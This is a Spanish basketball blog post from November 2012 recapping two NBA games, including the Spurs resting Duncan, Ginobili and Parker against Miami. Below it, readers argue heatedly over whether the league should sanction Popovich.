La Crónica: Menú corto

30 de November de 2012 por Viva_Dirk

Tan solo 2 partidos en el escueto menú de esta noche.

En Miami asistimos a una de esas cosas raras que hace Popovich. Ayer, ante los todopoderosos Heat, dio descanso a Duncan, Ginobili y Parker. A la NBA no le ha gustado lo más mínimo la decisión del entrenador tejano y ya ha anunciado duras sanciones. A pesar de todo, los Spurs llegaron al último cuarto 3 arriba en el marcador, así de sólido es este equipo. Por parte de los de Florida, gran rendimiento del “Big Three” que aportó 60 puntos, 26 rebotes y 13 asistencias, y de Ray Allen que sumó 20 puntos. Por los tejanos el mejor fue Splitter, aunque casi todos los que jugaron lo hicieron a gran nivel.

En Oakland, los Warriors se llevaron la victoria ante los Nuggets gracias a un superlativo David Lee en la zona y a un excepcional trío anotador en el perímetro con Curry-Thompson-Jack a pleno rendimiento. La alegría para los Warriors no fue completa porque ayer también recibieron pésimas noticias sobre el estado de salud de Andrew Bogut, quien podría perderse toda la temporada. Por parte de Denver una gran versión de su juego exterior titular no fue suficiente. 

PREMIOS

MVP: David Lee completó un partido casi perfecto con 31 puntos, 9 rebotes, 6 asistencias y 13 de 15 en tiros de campo, actuación que le vale nuestro premio. LeBron James fue el mejor de los Heat con 23 puntos, 9 rebotes y 7 asistencias.

Rookie: Nando De Colo vio multiplicados sus minutos gracias al experimento de Popovich y respondió con 15 puntos, 6 rebotes y 5 asistencias, aunque también 5 pérdidas. Sin duda otra buena pieza para el engranaje de San Antonio.

Sorpresa: No hay mayor sorpresa que ver descansar a los 3 mejores jugadores de un equipo por decisión técnica. Eso provoca cosas como un 10-10 de Matt Bonner o los 20 puntos y 7 asistencias de Gary Neal.

Decepción: Mal partido de Andre Miller. En los 19 minutos que estuvo en pista perdió tantos balones como puntos anotó, un total de 2.

Mayor esfuerzo en vano: Tiago Splitter desde la titularidad dejó 18 puntos y 9 rebotes, pero el premio va para Ty Lawson al  que sus 17 puntos, 9 asistencias, 4 rebotes y 4 robos no le sirvieron para ganar a los Warriors.

Imágenes | AP Photos / Getty Images

Comenta

47 comentarios a esta entrada

  1. txusma dice:
    #1

    Yo he pegado una pasta por ver un Spurs-Heat y veo que no juegan ni Duncan, ni Ginobili ni Parker y pido que me devuelvan las entradas. He dicho.

      Citar

  2. Laker1624 dice:
    #2

    Es cierto que decisiones como la que ha tomado hoy Popovich son una pu**** para aquellos que asisten al pabellón o para aquellos que apenas duermen para ver el partido, pero aun así puedo entender (en parte) lo que ha hecho. En un calendario tan apretado y cargado de partidos como este veo normal que de descanso a jugadores importantes (y que ya tienen sus añitos) para que puedan llegar en la mejor forma posible a los últimos meses de competición. Lo que no entiendo es porque ha dado descanso a sus tres mejores jugadores en el mismo partido siendo además contra un rival de tan alto nivel.

    Aunque también hay que decir que no le ha salido tan mal la jugada…

      Citar

  3. Jose Luis dice:
    #3

    Hombre, yo lo que veo normal es que haya dado descanso en este partido. Miami viene de 5 días descansando, y ellos de un largo viaje, jugando 4 partidos en 5 días. Normal que les haya dado descanso justo en este partido, un partido que va a ser muy físico, de mucho correr, y ante el campeón Miami Heat… Popovich sabía que tenía pocas opciones de ganarlo.

      Citar

  4. Laker1624 dice:
    #4

    Creo que ademas Green tampoco ha ido convocado..

    Aun asi muy meritorio el partido de SAS. Si siguen a este ritmo los veo mejor que el año pasado de cara a Playoffs, mas que nada por la aportacion de los secundarios.

      Citar

  5. Sancho88 dice:
    #5

    Lo curioso es que a Tony Parker le sigue llamando viejo a la cara. El año pasado ya dijo Parker que no, que no entendía por qué le daba tantos descansos Popo, que él lo único que quería era jugar todo el tiempo. Tiene solo 30 años maldita sea…Joder, vale que a Tim lo sientes, osea, pero ni de coña no lo saques a jugar. Por 20 minutos que esté en la cancha no le iba a pasar nada, y a Manu lo mismo, y si quieres a Parker le pones 25 minutos, pero dejarlos sin jugar es una putada para la gente que paga la pasta, pues hay que recordar que eso es espectáculo de primer nivel, y se paga como tal. No sé, nunca entenderé a los Popovich, Maljikovic, Ivanovic, etc. que siguen adaptando los métodos de la escuela balcánica despues de mas de 20 años y ya no hay quien los entienda. Cuando de repente parece que Popo se apunta al carro de la modernidad, nos sorprende con estas cosas de carro también… pero de carro-za, porque vaya tela con el tío… En fin.

    Como dijo Biyukov hace poco, “Yo le decía a Obradovic esto es una mierda, todo el día defendiendo dando hostias y dando hostias…” jejeje. Si hay algún despistado de la vida, por favor, preparaos algo, un caldito, té, café, bebidas alcohólicas varias, y disfrutad de esta joya de entrevista.

    http://www.jotdown.es/2012/11/chechu-biriukov-la-nba-me-parece-un-conazo-siempre-lo-mismo/

    Pero no os quedéis con el titular, la entrevista es cojonuda, pero el titular no le hace justicia

      Citar

  6. txusma dice:
    #6

    Justo iba a decir lo de Parker. Que Duncan descanse, vale. Que Ginobili descanse… bueno, vale. Pero que lo haga Parker?

    Que grande Byriukov. Q tiempos! De los primeros recuerdos que tengo del Madrid de baloncesto. Aunque el primero creo q es el momento en que me enteré que Fernando Martín había muerto en accidente de coche. Q golpe!

      Citar

  7. Esteban dice:
    #7

    el año pasado POPOVICH hizo lo mismo, no recuerdo bien en que juego, y todos los aplaudian de que como manejaba los descansos de sus jugadores, de lo sabio que es etc, etc, etc

    ya sabemos como termino esa historia

    y ahora lo repite, me parece una idiotez, CUANDO DESCANSO GANAN LOS JUGADORES POR NISIQUIRA CAMBIARSE?
    si son 82 juengos, que juegen 81 no tiene el mas minimo sentido

    me parece una payasada lo que hizo

      Citar

  8. Chipi dice:
    #8

    Pues te perdiste los duelos Martín-Norris. Rondo y Humphries a su lado, unas hermanitas de la caridad.

    La entrevista a Chechu ya la leí hace un par de semanas y, aparte de que el tipo nunca me cayó bien, siempre dijo tonterías a diestro y siniestro. La última, que Petrovic era “limitado”.

      Citar

  9. Rompe dice:
    #9

    Pues a mi me parece perfecto lo que hace el tío Popovich… Nadie mejor que él sabe el estado de la plantilla, y lo que se juegan en cada partido. Y desde luego no se puede decir que los resultados no le acompañen, así que habrá que dejarle hacer…

      Citar

  10. Lanegan dice:
    #10

    Esteban:
    el año pasado POPOVICH hizo lo mismo, no recuerdo bien en que juego, y todos los aplaudian de que como manejaba los descansos de sus jugadores, de lo sabio que es etc, etc, etc

    ya sabemos como termino esa historia

    y ahora lo repite, me parece una idiotez, CUANDO DESCANSO GANAN LOS JUGADORES POR NISIQUIRA CAMBIARSE?si son 82 juengos, que juegen 81 no tiene el mas minimo sentido

    me parece una payasada lo que hizo

    Esteban, en el computo global de una temporada un partido + o – da igual. Pero yo si entiendo su decisión, me parece una forma de minimizar el riesgo de lesiones en jugadores de cierta edad que llevan 4 partidos sin descanso y que se encuentran ante una partido de máxima exigencia atlética. Aunque quizás es una forma de protestar por el diseño del calendario, que no parece muy coherente.

      Citar

  11. Sancho88 dice:
    #11

    No no, si Chechu dice unas chorradas como puños, pero la entrevista es para reirte, jejej

      Citar

  12. Esteban dice:
    #12

    Lanegan: Esteban, en el computo global de una temporada un partido + o – da igual. Pero yo si entiendo su decisión, me parece una forma de minimizar el riesgo de lesiones en jugadores de cierta edad que llevan 4 partidos sin descanso y que se encuentran ante una partido de máxima exigencia atlética. Aunque quizás es una forma de protestar por el diseño del calendario, que no parece muy coherente.

    OK, pero q se joda popovich, si todos protestaran como el cada tanto veriamos descansando a los jugadores, quien se cree que es para protestar contra el calendario?
    q venga a dirigir a argentina si quiere que se juega dos veces por semana, aca si que los jugadoresestan frescos

    esa cara de POPOVICH de dirigo en la NBA, pero no me la aguanto o yo no soy como ellos me parece muy mentirosa, GREG HIJO SI DIRIGES EN LA NBA TE LA AGUANTAS Y YA,

    los spurs juuegan la misma cantidad de juegos que el resto de los equipos y tienen un calendario igual de duro que el de cualquiera, todos acatan las ordenes y juegan sin chistar y popovich no, que deje la NBA si no le gusta!!!

    una amiga mia de argentina, viajo a NY el año pasado, y saco por anticipadas las entradas par ver NYK vs los Spurs, le valio un dineral de dolares, pero queria ver a manu, duncan, parker etc

    q linda sorpresa se hubiese encontrado si al bueno de popovich se le ocurria poner un equipo como el de ayer

    q se joda POPOVICH

      Citar

  13. Pop dice:
    #13

    Esteban: OK, pero q se joda popovich, si todos protestaran como el cada tanto veriamos descansando a los jugadores, quien se cree que es para protestar contra el calendario?
    q venga a dirigir a argentina si quiere que se juega dos veces por semana, aca si que los jugadoresestan frescos

    esa cara de POPOVICH de dirigo en la NBA, pero no me la aguanto o yo no soy como ellos me parece muy mentirosa, GREG HIJO SI DIRIGES EN LA NBA TE LA AGUANTAS Y YA,

    los spurs juuegan la misma cantidad de juegos que el resto de los equipos y tienen un calendario igual de duro que el de cualquiera, todos acatan las ordenes y juegan sin chistar y popovich no, que deje la NBA si no le gusta!!!

    una amiga mia de argentina, viajo a NY el año pasado, y saco por anticipadas las entradas par ver NYK vs los Spurs, le valio un dineral de dolares, pero queria ver a manu, duncan, parker etc

    q linda sorpresa se hubiese encontrado si al bueno de popovich se le ocurria poner un equipo como el de ayer

    q se joda POPOVICH

    Con el debido respeto eso es una sarta de tonterías. Aquí los que se pueden quejar son los seguidores que querían ver a sus estrellas, y como mucho los patrocinadores (NBA entre ellos). El técnico tiene sus planteamientos, sus estrategias y su planificación para conseguir los mejores resultados posibles (que para eso le pagan), y dentro de las reglas lo lleva a cabo de la manera que él estime oportuna.

    Es una putada ir a ver un partido a ver a tus estrellas y que no estén, pero el día que eso influya decisivamente en las decisiones de un entrenador dejará de ser un deporte para siempre y será una gira de pop-rock. Podremos opinar sobre si es acertado o no, sobre si Parker no tiene por qué seguir las mismas restricciones que Duncan, etc… Pero lo demás que dices no tiene sentido. Es un entrenador, ganador para más señas, y juega para ganar.

    Si los Spurs quieren poner precios especiales para este tipo de partidos que los pongan, o que inviten a perritos calientes, o yo que sé. Pero que no le digan a Popovich cómo gestionar su plantilla.

    Y lo de descansar un partido aunque haya 80 tiene mucho sentido a nivel fisiológico, cuando tienes más de 30 años y juegas 5 partidos en 1 semana.

    Perdonad que me ponga un poco serio con esto, pero me toca la fibra porque mi profesión es precisamente entrenador (aunque en otro deporte).

      Citar

  14. Laker1624 dice:
    #14

    Yo también opino que los resultados deportivos deben estar por encima del sentido del espectáculo. Si Popovich creía que dejar al Big three en casa era lo mejor para el equipo veo bien que lo haya hecho. Tampoco ha tirado el partido, porque poco les ha faltado para llevárselo. Claro que aquí los que han salido peor parados han sido los espectadores.. Pero bueno, nunca llueve a gusto de todos

      Citar

  15. nba dice:
    #15

    Es que yo creo que a Esteban parece que se le ha ido un poco la pinza, estoy completamente de acuerdo con Pop, lo de Stern me parece una pataleta, es que ya solo falta que decida el quien juega de titular cada partido.
    Que opinaran de todo esto Diaw-Splitter-Blair??,

      Citar

  16. Laker1624 dice:
    #16

    Sin duda Diaw y cia se sentirán apreciadísimos por lo opinión publica.

      Citar

  17. Laker1624 dice:
    #17

    ¿Soy al único que le parece absolutamente surrealista que se sancione a SAS por no convocar a sus estrellas para 1 partido?

      Citar

  18. Sancho88 dice:
    #18

    Amigo, hay unas reglas en el mundo real, y la NBA lógicamente no se salva. Estados Unidos vende espectáculo ante todo. Nadie dijo que fuera un mundo justo. Popo es idealista, antiprensa, divo, pero las cosas funcionan de una manera y con unas reglas. Se las ha saltado y seguramente, como dice Esteban, muchos paisanos hayan pagado su entrada para ver jugar a Parker, Duncan y Manu… esa gente qué quieres q piense de todo esto?

      Citar

  19. Pop dice:
    #19

    Sancho88:
    Amigo, hay unas reglas en el mundo real, y la NBA lógicamente no se salva. Estados Unidos vende espectáculo ante todo. Nadie dijo que fuera un mundo justo. Popo es idealista, antiprensa, divo, pero las cosas funcionan de una manera y con unas reglas. Se las ha saltado y seguramente, como dice Esteban, muchos paisanos hayan pagado su entrada para ver jugar a Parker, Duncan y Manu… esa gente qué quieres q piense de todo esto?

    ¿Qué regla concreta se ha saltado? Stern lo va a vender como una falta de respeto, cuando la falta de respeto es lo que está haciendo él.

    Una pregunta: ¿si los Spurs ganan el partido (que apunto estuvieron), Stern tiene cojones de decir lo mismo? Si la respuesta es SÍ, yo soy Diaw, por ejemplo, y le denuncio, tal cual. Si la respuesta es NO (que sería lo más probable), entonces la sanción es ilógica.

    O sea, que no. Lo hará como tantas gilipolleces ha hecho ya, pero nuevamente se va a cubrir de gloria. “Basketball reasons”

      Citar

  20. Laker1624 dice:
    #20

    ¿Pero que regla se ha saltado Popovich?¿Hay alguna norma que le obligue a poner a todos sus cracks si estos están sanos? Yo diría que no, igual me equivoco. Si existe esa regla LeBron tampoco la conoce, porque ha respondido lo mismo cuando ha sido informado de que sancionarían a los Spurs.

    Se que jode ir a ver un partido y que no estén todos los cracks, a mi me paso lo mismo con Dirk en el Barça-Mavs (Aunque fuera por un motivo distinto), pero bueno, supongo que algún día lo superaran… Esto es un deporte y hay que ganar. Si un entrenador con todo el crédito del mundo como Popovich creía que era lo mejor para el equipo, yo lo respeto.

      Citar

  21. Pop dice:
    #21

    Es que vamos, me indigno por momentos. Lo que pasa es que el partido era “el partido del jueves” y la TV le ha cantado las 40 porque la gente no ha visto a Duncan y cia.

    De ahí a que la NBA y Nike elijan las alineaciones cada partido hay un paso.

      Citar

  22. Laker1624 dice:
    #22

    ¿Pero que regla se ha saltado Popovich?¿Hay alguna norma que le obligue a poner a todos sus cracks si estos están sanos? Yo diría que no, igual me equivoco. Si existe esa regla LeBron tampoco la conoce, porque ha respondido lo mismo cuando ha sido informado de que sancionarían a los Spurs.

    Se que jode ir a ver un partido y que no estén todos los cracks, a mi me paso lo mismo con Dirk en el Barça-Mavs (Aunque fuera por un motivo distinto), pero bueno, supongo que algún día lo superaran… Esto es un deporte y hay que ganar. Si un entrenador con todo el crédito del mundo como Popovich creía que era lo mejor para el equipo, yo lo respeto.

      Citar

  23. Sancho88 dice:
    #23

    Hay que respetar la regla no escrita del espectáculo. Por esa mentalidad de mierda en Europa va el deporte tan mal, porque solo quieren ganar y no comprenden que todo forma parte de un pack, y que tu no solo ganas si ganas el partido, sino si creas una imagen alrededor de tu equipo y de tu deporte, y consigues que la gente vaya al campo y te pague la entrada. Con esta actitud, yo no iria a ver a los Spurs por si acaso, por lo que pueda pasar. Y perdona, pero yo no pago 100 y pico euros por ver a Diaw, De Colo, Anderson…

      Citar

  24. Pop dice:
    #24

    Sancho88:
    Hay que respetar la regla no escrita del espectáculo. Por esa mentalidad de mierda en Europa va el deporte tan mal, porque solo quieren ganar y no comprenden que todo forma parte de un pack, y que tu no solo ganas si ganas el partido, sino si creas una imagen alrededor de tu equipo y de tu deporte, y consigues que la gente vaya al campo y te pague la entrada. Con esta actitud, yo no iria a ver a los Spurs por si acaso, por lo que pueda pasar. Y perdona, pero yo no pago 100 y pico euros por ver a Diaw, De Colo, Anderson…

    Que sí, pero que qué coño tiene que ver Stern en eso. Si los espectadores se cabrean porque en ese partido no han visto a sus estrellas, pues que sea la directiva la que le dé el sermón a Popovich. ¿Quién cojones es Stern para regañarle a un equipo porque no alinea a sus estrellas? Si los Knicks no ponen a Stat de titutal cuando vuelva, ¿los va a sancionar Stern porque el público quiere a Stat? Venga, Sancho, no me jodas. Una cosa es criticar la actitud conservadora resultado-por-encima-de-espectáculo de Popo (y estoy de acuerdo contigo) y otra cosa es sancionale y obligarle a lo contrario.

    Vamos, hombre, decisión propia de Stalin. Por el bien del pueblo le cortamos los derechos fundamentales a una persona.

      Citar

  25. Laker1624 dice:
    #25

    No se de donde sacas que el deporte europeo va tan mal…

    Creo que se están sacando las cosas de contexto por lo de hoy.. La pobre gente que ha ido al pabellón solo ha podido ver a LeBron, Wade y Bosh…

    Si hay un equipo ganador en los últimos tiempos son los Spurs, y además practicando un gran baloncesto. Para ver espectáculo ya esta el All Star y el circo.

      Citar

  26. Sancho88 dice:
    #26

    Yo de hecho, no apruebo la sanción, creo que más bien sanciono (valga la redundancia) pero verbalmente, en mi posición de aficionado, la actitud de este entrenador y el flaco favor que le ha hecho al espectáculo. Si Stern quiere aplicar su sternato una vez más, está en su derecho. Te diré comoe stoy yo de cabreado con ese cabron por lo de Virginia Beach y Sacramento. Supongo que algo os habréis entereado de todo esto.. no seré yo el que apoye a Stern ahora, pero si digo que a Popo tampoco

      Citar

  27. Pop dice:
    #27

    Sancho88:
    Yo de hecho, no apruebo la sanción, creo que más bien sanciono (valga la redundancia) pero verbalmente, en mi posición de aficionado, la actitud de este entrenador y el flaco favor que le ha hecho al espectáculo. Si Stern quiere aplicar su sternato una vez más, está en su derecho. Te diré comoe stoy yo de cabreado con ese cabron por lo de Virginia Beach y Sacramento. Supongo que algo os habréis entereado de todo esto.. no seré yo el que apoye a Stern ahora, pero si digo que a Popo tampoco

    Pues estamos de acuerdo entonces, pero coincidirás conmigo que entre afearle la conducta a alguien y “aplicar sanciones ejemplares” hay mil jodidas millas, que diria M. Wallace.

    Criticar o alentar conductas es una cosa. Prohibirlas u obligarlas es cosa de dictadores.

      Citar

  28. simon dice:
    #28

    Venia a escribir mi opinión sobre todo esto pero con leer a Pop no creo que haga falta que añada nada mas, simplemente un +1. Stern no es nadie para sancionar a un equipo por hacer las alineaciones que mas le interesan en cada momento. Mas se debería preocupar en los finales de temporada cuado los equipos pierden a drede buscando el pick 1, eso si debería ser sancionable, esto como mucho la tele y los espectadores pueden y deben sentirse frustrados pero no es sancionable.

      Citar

  29. Esteban dice:
    #29

    Vamos no seamos ilusos con la idea de ganar en la NBA, alli es todo negocio, hay reglas de juego armadas para el espectaculo, tiempos muertos, defensas prohibidas, pasos permitidos, etc

    Me cabrean los hipocritas como popovich q despotrican contra la NBA pero no largan su lugar en el banquillo ni de broma y bien q se hacen ricos a costa del negocio

    Como dije, si le molesta el calendario NBA, q venga a dirigir a la argentina por el 2 por ciento del sueldo q cobra en san antonio, y va a dirigir mucho menos y sus jugadores estaran descansaditos

    Ahora si le gusta ser rico y dirigir en la mejor liga del mundo, q se banque el calendario y no patalee

      Citar

  30. Esteban dice:
    #30

    Aclaro, mi colera viene por el lado de q entiendo q popovich lo hace para quedar como el rebelde de la nba, no por q crea q es mejor para sus jugadores

    A ver, si no hay una intencion de quedar como el q se anima a romper las reglas, pone en la lista de lesionados a manu, duncan y parkar o no los hace entrar y listo

    Me parece exagerado mandarlos a casa como si no le importara el q diran

    Ah tampoco jugaron leonard, danny green y jackson, los dos primeros son unos crios, no tiene sentido la rotacion

      Citar

  31. Denise dice:
    #31

    Sancho88:
    Hay que respetar la regla no escrita del espectáculo. Por esa mentalidad de mierda en Europa va el deporte tan mal, porque solo quieren ganar y no comprenden que todo forma parte de un pack, y que tu no solo ganas si ganas el partido, sino si creas una imagen alrededor de tu equipo y de tu deporte, y consigues que la gente vaya al campo y te pague la entrada. Con esta actitud, yo no iria a ver a los Spurs por si acaso, por lo que pueda pasar. Y perdona, pero yo no pago 100 y pico euros por ver a Diaw, De Colo, Anderson…

    Totalmente de acuerdo. El espectaculo debe permanecer por encima del deporte, porque si

      Citar

  32. Denise dice:
    #32

    Sancho88:
    Hay que respetar la regla no escrita del espectáculo. Por esa mentalidad de mierda en Europa va el deporte tan mal, porque solo quieren ganar y no comprenden que todo forma parte de un pack, y que tu no solo ganas si ganas el partido, sino si creas una imagen alrededor de tu equipo y de tu deporte, y consigues que la gente vaya al campo y te pague la entrada. Con esta actitud, yo no iria a ver a los Spurs por si acaso, por lo que pueda pasar. Y perdona, pero yo no pago 100 y pico euros por ver a Diaw, De Colo, Anderson…

    Totalmente de acuerdo, el espectaculo debe permanecer por encima del deporte. Al fin y al cabo esto es un negocio. Si solo se trata de deporte, que coño hacen Nike, Adidas, las televisiones y otras multinacionales pagando una gran pasta a jugadores y equipos.

    El baloncesto en Europa está acabado, muerto, no interesa a practicamente nadie gracias a no fomentar el espectaculo abriendo otras vias de ingresos y diversificando el producto; sin contar con esos partidos de 60 puntos.
    Y sobre el futbol…si no se arregla pronto, las ligas domesticas, especialmente la española desaparecerán y supongo que se creará una liga de futbol a lo NBA. A los grandes clubes solo les importa ganar y ganar dandole el ojete al espectaculo, lo que se traduce en que actualmente para cada vez mas gente es infumable ver un Barça-Osasuna o un Madrid-Granada, es decir 28 de cada 38 partidos de Barça y Madrid son infumables desde el punto de vista del espectaculo y la emoción.

    Creo que Stern debería volver a imponer una dura sanción a Popovych y a los malditos Spurs, para que otros no empiecen a hacer lo mismo, o si no, empezaremos a ver a los cracks jugando 50 partidos al año.

      Citar

  33. Sancho88 dice:
    #33

    Es que el tema de la sanción tampoco es la solución, ya que políticamente no es correcto y está claro que Popo queda como el bueno de la peli y Stern queda como el malo. Yo le diría a Popo. Veamos, usted llega a los Spurs después del cataclismo de la NBC, los años donde se ponía la pasta de cojones por parte de la tele. Llega dos años del asterisco, la NBC se pira, Jordan se retira y ellos ganan aquel anillo. Debería saber que ahora la liga ingresa muchísma menos pasta por parte de ABC, TNT, ESPN y CBS, si no me equivoco, que son las cuatro que ponen la pasta aparte de las locales que negocian aparte, como Time Warner con los Lakers. Y llega la TNT, que si no me equivoco da los dos partidos del jueves y compra un pack de partidos en playoffs. Llega la TNT y le estás diciendo, que si a la semana programan dos partidos en prime time, uno de ellos se lo tiras a la basura por un puto capricho y por quedar de listillo. Ok, al año que viene, igual este tipo de cadenas empiezan a desconfiar de este tipo de entrenadores y bajan su oferta, la NBA tiene que exigir menos dinero para vender su producto y todos salen perdiendo.

    Es que al final, como dice Denise, esto es un negocio. Coño, deporte es jugar en la calle con los colegas o en ligas federadas de provincia, esto es algo más que deporte, que nadie se haga el tonto. Tienes a tres tipos que si no juegan en el partido más importante de la semana para la NBA, porque es el partido por el que más pasta recaudan, ya le están dando un bofetón más a la imagen ya de por sí devaluada de la NBA, que no acaba de superar su segundo lockout y ahora se ve inmersa en un problema clarísimo de imagen.

    Entonces qué, ahora después de todo esto, seguís pensando pobrecito Popo?? Pues yo digo, pobrecitos los que trasnocharon para verlo, los que pagan el cable de TNT, los que fueron al Arena de Miami. Pobrecitos porque fueron a ver liebre y les dieron gato, todo porque un estúpido quiso hacerse el ways. A mí Popo como entrenador no le puedo reprochar nada, ya que hace jugar bien a su equipo, pero como persona… me parece un auténtico estúpido. El año pasado palmó con OKC por jugar a ser dios y tirar por la borda todo el trabajo colectivo hecho durante el año, y ahora hace esto. La NBA no merece este tipo de desprecios

      Citar

  34. Sancho88 dice:
    #34

    Dicho esto, si no fuera por este tipo de provocadores, también todo parecería deshumanizado y monótono. Osea, creo que lo de Popo no se lo esperaba nadie, y eso es también algo atractivo, todo el tema de la polémica generada, sanciones, un tipo escéntrico y todo esto… no sé con cual quedarme jejeje. Yo al menos me lo he pasado muy bien en el día de hoy atizándole. Gracias Popovich, jejeje

      Citar

  35. Jose Luis dice:
    #35

    @Esteban

    Kawhi Leonard está lesionado. Lo de Danny Green sí que no tiene mucha explicación.

      Citar

  36. melo15 dice:
    #36

    Desde cuando Stern no queda como el malo de la pelicula?

      Citar

  37. Jose Luis dice:
    #37

    Artículo de Bruno Altieri sobre lo acontecido anoche.

    http://espndeportes.espn.go.com/news/story?id=1670876&s=bas&type=column

    Aún así, yo estoy a favor de Popovich.

      Citar

  38. txusma dice:
    #38

    Jose Luis:
    Artículo de Bruno Altieri sobre lo acontecido anoche.

    http://espndeportes.espn.go.com/news/story?id=1670876&s=bas&type=column

    Aún así, yo estoy a favor de Popovich.

    Viene a resumir lo q ya hemos comentado por aquí. La NBA no es solo deporte, es negocio para lo bueno y para lo malo. A lo mejor hay q replantearse el tema del calendario (no digo que no), pero Popovich y los jugadores cobran lo que cobran gracias al espectáculo generado. Hacer lo q hizo Popovich justo en el partido del jueves televisado para todo el país suena a pulso en toda regla. No podían haber descansado en el anterior?

    Una cosa buena hay: ha puesto sobre la mesa un problema. A ver como sale Stern de esta.

      Citar

  39. Jose_Dantley dice:
    #39

    Estoy a favor de Popovich. Cuando una liga se estructura con sus franquicias y las franquicias reparten responsabilidades, la del entrenador es la de ganar. La de la franquicia será ganar dinero, pero normalmente cuanto más se ganan títulos o más arriba se llega, más opciones de ganar, especialmente en franquicias de mercados menores como San Antonio.

    Eso puede molestar al público? Molesta más que llevar al extremo a jugadores con muchas horas de vuelo y que se lesionen? Lo primero se entiende como una deslealtad de Popovich y lo segundo como mala suerte. Cuando se pone al jugador rozando los límites, ese es el problema. Otros entrenadores lo hacen menos obviamente y Popovich fue menos hipócrita.

    ¿Sentido del espectáculo? Es un poco hipócrita que Stern piense en eso después de permitir equipos como Charlotte arrastrándose por la NBA en años pasados o de permitir descaradamente el tanking para buscar buenas posiciones en el draft.

      Citar

  40. Pop dice:
    #40

    Pero que os estáis equivocando, Denise y cia. Que le podéis llamar lo que queráis a Popovich, que los Spurs le pueden despedir si quieren porque no da espectáculo, que los espectadores se podrán indignar porque no los han visto este jueves (habrá que preguntarles de todos modos), que en USA el espectáculo está por encima del deporte…todo lo que queráis.

    PERO QUE ESO NO SE PUEDE IMPONER POR DECRETO LEY. Que no se puede sancionar a nadie por no seguirlo. Vamos hombre. Joder, que una cosa es publicar que Popovich es un rancio y mentarle hasta a la madre si queréis, y otra cosa es PONERLE UNA SANCION A LOS SPURS porque no juega quien dice la NBA que tiene que jugar. Por cojones.

    Es que a mí me parece denunciable a tribunales. Tal cual.

    Y coño, que es un puto partido. Que en USA prima el espectáculo, pero que no es sólo espectáculo. Si sólo quisieran espectáculo irían a ver a los GlobeTrotters y el Pressing Catch, y el All-Star tendría más audiencia cada vez, y no al revés.

      Citar

  41. rumbero dice:
    #41

    Es exactamente eso. Yo me uno a las criticas a Popovich, pero no seamos hipocritas, si el tio pone a los 3 y resulta que en el segundo cuarto los Spurs van palmando de 20 y decide no ponerlos más pues aqui no pasa nada, pero el espectaculo se va a la mierda igualmente. En cambio resulta que el partido no se decide hasta que quedan 20 segundos para acabar el partido. El tema es que el señor Stern no se puede meter en las alineaciones de los equipos, faltaría más, sino que empiecen a caer sanciones cuando Gasol, Griffin o Lopez no jueguen los últimos cuartos de un partido

      Citar

  42. melo15 dice:
    #42

    Yo estoy muy cabreado con Popovich, hay que querer fastidiar mucho para poner a descansar a tus 3 mejores jugadores justo en el partido de la semana. Y si creo que se les debe sancionar porque asi es como se aprende, no hay otra manera. Stern no se ha metido con la alineacion, lo que pasa esque si esto se convierte en costumbre podriamos encontarnos en que las estrellas solo juegan 60 partidos al año y eso no puede ser.
    La NBA es tan conocido por su espectaculo y es eso lo que le genera el 70% de las ganancias, si el espectaculo se pierde se pierde la NBA.

      Citar

  43. Pop dice:
    #43

    melo15:
    Yo estoy muy cabreado con Popovich, hay que querer fastidiar mucho para poner a descansar a tus 3 mejores jugadores justo en el partido de la semana. Y si creo que se les debe sancionar porque asi es como se aprende, no hay otra manera. Stern no se ha metido con la alineacion, lo que pasa esque si esto se convierte en costumbre podriamos encontarnos en que las estrellas solo juegan 60 partidos al año y eso no puede ser.
    La NBA es tan conocido por su espectaculo y es eso lo que le genera el 70% de las ganancias, si el espectaculo se pierde se pierde la NBA.

    ¿Que Stern no se ha metido con la alineación? ¡Les va a sancionar por su alineación! Y lo de que hay que sancionar para que aprenda…en fin.

    Que la discusión no es si espectáculo, si ético, si tal… si no si eso es sancionable.

    – ¿Han faltado al respeto al contrario? -> NO. Coño, no ganan por el canto de un duro.
    – ¿Han adulterado la competición? -> NO. No como los equipos que se dejan llevar desde marzo para conseguir buenas plazas, o como lo que hizo Francia en los JJOO.
    – ¿Ha mentido/sido hipócrita? -> NO. Sus razones estás más que claras: llevan una ronda muy dura y quería que descansaran. No les ha puesto en la lista de lesionados mintiendo, no hay dado excusas sin sentido. Que estemos de acuerdo es otra cosa.
    – ¿Ha quebrantado alguna regla/contrato? Que yo sepa NO. En partidos de exhibición y tal supongo que habrá cláusulas del tipo “para cobrar la prima Pau y Kobe deben jugar mínimo 25 minutos”. ¿En la NBA existe eso?

    ¿Qué razón hay entonces para la sanción?

    Lo que tenía que haber pasado es que Stern saliera diciendo que lo que habían hecho los Spurs no le parecía bien y que no lo aprobaba, que los aficionados podían sentirse decepcionados porque les privaban de ver a sus estrellas. Dicho esto, la dirección de los Spurs podía hablar con Popo (o no) y decirle “mira macho, la próxima vez haz que descanse uno cada vez, o hazlo de otra manera, porque cobramos de lo que paga la gente y esto puede hacer que venga menos gente. Que Stern me ha llamado y me ha dicho que ya nos vale y tal…”

    La sanción “en nombre del espectáculo”. ¿Qué vendría después? ¿Multar a los jugadores que acaben los contraataques con una insulsa bandejita?

    No se puede eliminar la libertad de un equipo para que gestione su equipo y ponga la alineación que ellos quieran, sobre todo cuando es en vistas de hacerlo bien y no mal. En nombre de nada.

      Citar

  44. Pop dice:
    #44

    En las discusiones de los opinadores de la NBA la opinión mayoritaria es la misma:

    http://hangtime.blogs.nba.com/2012/11/30/blogtable-what-about-pop/

    Y los cibernautas de NBA.com también (más del 60% opinan que no debería haber sanciones):

    http://hangtime.blogs.nba.com/2012/11/30/spurs-fined-25000-for-resting-players/

    Por cierto, mi nick no tiene nada que ver con Popovich, por si véis intereses de por medio xD

      Citar

  45. Lucho dice:
    #45

    100% de acuerdo con Pop. Lo ha puesto clarisimo, suscribo cada palabra.

    Otra cosa, los Celtics encontraron en Courtney Lee , dos años despues, el reemplazo de Tony Allen? O estoy diciendo una barbaridad?

      Citar

  46. jose_dantley dice:
    #46

    Iba a decir más, Pop, pero ya lo has dicho todo.

    Los han multado con 250.000 dólares. Cuando los Miami Heat jugaron hace tres temporadas el final de liga regular con los Miami D-League para conseguir un puesto mejor en el draft no hubo sanción, viva el espectáculo.

    Lo curioso es que el futuro Stern, Adam Silver, dijo en una situación similar con los Spurs el año pasado, que eso es potestad de los equipos.

    Si Stern quiere una liga fantástica, que se la monte él mismo con su dinero, pero los Spurs son soberanos para intentar maximizar sus beneficios.

    El problema es que haya una sanción oculta en forma de arbitraje criminal en algún partido clave.

      Citar

  47. nba dice:
    #47

